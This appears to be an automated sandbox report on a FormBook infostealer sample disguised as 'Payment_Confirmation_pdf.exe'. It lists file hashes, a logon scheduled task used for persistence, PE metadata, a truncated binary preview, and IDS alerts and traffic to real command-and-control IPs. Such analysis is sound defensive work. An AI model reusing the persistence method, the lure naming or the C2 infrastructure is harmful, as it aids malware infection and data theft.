                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Users\user\Desktop\Payment_Confirmation_pdf.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1600
                                                                      Entropy (8bit):5.1202983725775955
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtHaxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTHuv
                                                                      MD5:A1249FE0AF4EB6C383CD5D84A8E7A5F2
                                                                      SHA1:044667F1D617DB3A75FD973FD477B867C44ED416
                                                                      SHA-256:0CA4DC59CB0836AE80A0A3210009366B21E824BED02702115F6297FE15E7E28D
                                                                      SHA-512:2FAB8EF0D18C173B3FAF2D9193CAF70032A7C608DE8E4485B167E4EB4BBFD78093248A98CDF450C0FF419564F4F0EF9849C32EDCC90F6647025F59A84FB4341D
                                                                      Malicious:true
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                                      Process:C:\Users\user\AppData\Roaming\cQwRvD.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1600
                                                                      Entropy (8bit):5.1202983725775955
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtHaxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTHuv
                                                                      MD5:A1249FE0AF4EB6C383CD5D84A8E7A5F2
                                                                      SHA1:044667F1D617DB3A75FD973FD477B867C44ED416
                                                                      SHA-256:0CA4DC59CB0836AE80A0A3210009366B21E824BED02702115F6297FE15E7E28D
                                                                      SHA-512:2FAB8EF0D18C173B3FAF2D9193CAF70032A7C608DE8E4485B167E4EB4BBFD78093248A98CDF450C0FF419564F4F0EF9849C32EDCC90F6647025F59A84FB4341D
                                                                      Malicious:false
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                                      Process:C:\Users\user\Desktop\Payment_Confirmation_pdf.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):861704
                                                                      Entropy (8bit):7.659730691957718
                                                                      Encrypted:false
                                                                      SSDEEP:24576:3oQ1dzG4CqqUZltSYTWQThVb63Dc9apeCC:zdzGhqFltSDQlVb6zc5CC
                                                                      MD5:DBB00CEAC5C3C668BDBB0C91DF825BE7
                                                                      SHA1:E865268EE5DE35A4FD0C4754A43A27AD1126BB72
                                                                      SHA-256:F600CD0546FA26D446A964C8520A7016313990D8D9886AE84778F5B474DC814E
                                                                      SHA-512:DC7B5202F3A3E15C8E50C8CF6071A2AE7E966D555BC79D834769E9DCF1C72BB9D428804A2B8E3049B77776FE012E0D16C0BF2B3D79FA270A1C0D1270A9B22C65
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Fg..............0.................. ........@.. .......................@............@.....................................O........................6... ....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........`.......5...l...`...........................................".(%....*....0..6.............s&.....('.....o(..........o)...o*..........+...*...................0..b........s+....(,.....o-......o.....+..o/...t..........o(...o0...&..o1...-....u........,...o2........+...*..........)E.......0..^........s+....(,......o3...o.....+..o/...t........o4...o0...&..o1...-....u........,...o2........+...*..........'A.......0..^........s+....(5......o6...o.....+..o/...t........o4...
                                                                      Process:C:\Users\user\Desktop\Payment_Confirmation_pdf.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.659730691957718
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:Payment_Confirmation_pdf.exe
                                                                      File size:861'704 bytes
                                                                      MD5:dbb00ceac5c3c668bdbb0c91df825be7
                                                                      SHA1:e865268ee5de35a4fd0c4754a43a27ad1126bb72
                                                                      SHA256:f600cd0546fa26d446a964c8520a7016313990d8d9886ae84778f5b474dc814e
                                                                      SHA512:dc7b5202f3a3e15c8e50c8cf6071a2ae7e966d555bc79d834769e9dcf1c72bb9d428804a2b8e3049b77776fe012e0d16c0bf2b3d79fa270a1c0d1270a9b22c65
                                                                      SSDEEP:24576:3oQ1dzG4CqqUZltSYTWQThVb63Dc9apeCC:zdzGhqFltSDQlVb6zc5CC
                                                                      TLSH:BC0502946374C606E1E60B70A8B0C3B523B57E85B412E31B9BE8ECEB3D657416D0B3D6
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Fg..............0.................. ........@.. .......................@............@................................
                                                                      Icon Hash:53084c444c441845
                                                                      Entrypoint:0x4cf31e
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:true
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x67461F90 [Tue Nov 26 19:20:48 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                      Signature Valid:false
                                                                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                      Error Number:-2146869232
                                                                      Not Before, Not After
                                                                      • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                                                      Subject Chain
                                                                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                      Version:3
                                                                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                      Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xcf2cc0x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd00000x1694.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xcf0000x3608
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000xcd3240xcd4002c6c59d67d07a01e8446baa8c99499b8False0.8552498858099878data7.66363017602626IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xd00000x16940x180051a9a7b244178259d97bf441709be5a0False0.7150065104166666data6.7297863733534244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0xd20000xc0x20096e3e60fe3b9a8e3d1cffd46316e778dFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0xd01000xfbePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.892803970223325
                                                                      RT_GROUP_ICON0xd10d00x14data1.05
                                                                      RT_VERSION0xd10f40x3a0data0.41810344827586204
                                                                      RT_MANIFEST0xd14a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-27T08:55:03.951497+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749810103.224.182.24280TCP
                                                                      2024-11-27T08:55:21.212102+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749849118.107.250.10380TCP
                                                                      2024-11-27T08:55:23.883923+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749859118.107.250.10380TCP
                                                                      2024-11-27T08:55:26.556719+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749865118.107.250.10380TCP
                                                                      2024-11-27T08:55:29.257259+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749871118.107.250.10380TCP
                                                                      2024-11-27T08:55:45.962255+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749908163.44.185.18380TCP
                                                                      2024-11-27T08:55:48.537493+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749917163.44.185.18380TCP
                                                                      2024-11-27T08:55:51.290303+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749923163.44.185.18380TCP
                                                                      2024-11-27T08:55:53.964205+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749929163.44.185.18380TCP
                                                                      2024-11-27T08:56:02.587195+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749950120.26.240.12180TCP
                                                                      2024-11-27T08:56:05.260056+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749956120.26.240.12180TCP
                                                                      2024-11-27T08:56:07.920593+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749962120.26.240.12180TCP
                                                                      2024-11-27T08:56:10.666117+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749970120.26.240.12180TCP
                                                                      2024-11-27T08:56:17.723762+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749988209.74.77.10880TCP
                                                                      2024-11-27T08:56:22.397291+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749996209.74.77.10880TCP
                                                                      2024-11-27T08:56:25.106201+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749997209.74.77.10880TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 27, 2024 08:55:02.576994896 CET4981080192.168.2.7103.224.182.242
                                                                      Nov 27, 2024 08:55:02.697016001 CET8049810103.224.182.242192.168.2.7
                                                                      Nov 27, 2024 08:55:02.697144032 CET4981080192.168.2.7103.224.182.242
                                                                      Nov 27, 2024 08:55:02.716839075 CET4981080192.168.2.7103.224.182.242
                                                                      Nov 27, 2024 08:55:02.836813927 CET8049810103.224.182.242192.168.2.7
                                                                      Nov 27, 2024 08:55:03.951308966 CET8049810103.224.182.242192.168.2.7
                                                                      Nov 27, 2024 08:55:03.951390028 CET8049810103.224.182.242192.168.2.7
                                                                      Nov 27, 2024 08:55:03.951423883 CET8049810103.224.182.242192.168.2.7
                                                                      Nov 27, 2024 08:55:03.951497078 CET4981080192.168.2.7103.224.182.242
                                                                      Nov 27, 2024 08:55:03.951525927 CET4981080192.168.2.7103.224.182.242
                                                                      Nov 27, 2024 08:55:03.954655886 CET4981080192.168.2.7103.224.182.242
                                                                      Nov 27, 2024 08:55:04.074481964 CET8049810103.224.182.242192.168.2.7
                                                                      Nov 27, 2024 08:55:19.553369045 CET4984980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:19.673594952 CET8049849118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:19.673697948 CET4984980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:19.696070910 CET4984980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:19.816076040 CET8049849118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:21.212101936 CET4984980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:21.295358896 CET8049849118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:21.295432091 CET4984980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:21.295449018 CET8049849118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:21.295516014 CET4984980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:21.332118988 CET8049849118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:21.332238913 CET4984980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:22.230607033 CET4985980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:22.350625038 CET8049859118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:22.354038000 CET4985980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:22.368973970 CET4985980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:22.488985062 CET8049859118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:23.883923054 CET4985980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:23.960669994 CET8049859118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:23.960726976 CET8049859118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:23.960745096 CET4985980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:23.960772038 CET4985980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:24.003864050 CET8049859118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:24.003948927 CET4985980192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:24.902745962 CET4986580192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:25.024812937 CET8049865118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:25.024945021 CET4986580192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:25.040004969 CET4986580192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:25.162082911 CET8049865118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:25.162224054 CET8049865118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:26.556719065 CET4986580192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:26.677217007 CET8049865118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:26.677269936 CET4986580192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:27.576302052 CET4987180192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:27.696327925 CET8049871118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:27.696468115 CET4987180192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:27.705939054 CET4987180192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:27.825886011 CET8049871118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:29.256972075 CET8049871118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:29.257055044 CET8049871118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:29.257258892 CET4987180192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:29.260204077 CET4987180192.168.2.7118.107.250.103
                                                                      Nov 27, 2024 08:55:29.380111933 CET8049871118.107.250.103192.168.2.7
                                                                      Nov 27, 2024 08:55:44.315335989 CET4990880192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:44.435297966 CET8049908163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:44.435441971 CET4990880192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:44.453521013 CET4990880192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:44.574886084 CET8049908163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:45.962255001 CET4990880192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:45.976119041 CET8049908163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:45.976160049 CET8049908163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:45.976171017 CET8049908163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:45.976286888 CET4990880192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:45.976309061 CET8049908163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:45.976322889 CET8049908163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:45.976356030 CET4990880192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:45.976414919 CET8049908163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:45.976425886 CET8049908163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:45.976438046 CET8049908163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:45.976445913 CET4990880192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:45.976449966 CET8049908163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:45.976463079 CET8049908163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:45.976571083 CET4990880192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:46.981877089 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:47.102009058 CET8049917163.44.185.183192.168.2.7
                                                                      Nov 27, 2024 08:55:47.102164984 CET4991780192.168.2.7163.44.185.183
                                                                      Nov 27, 2024 08:55:47.119599104 CET4991780192.168.2.7163.44.185.183
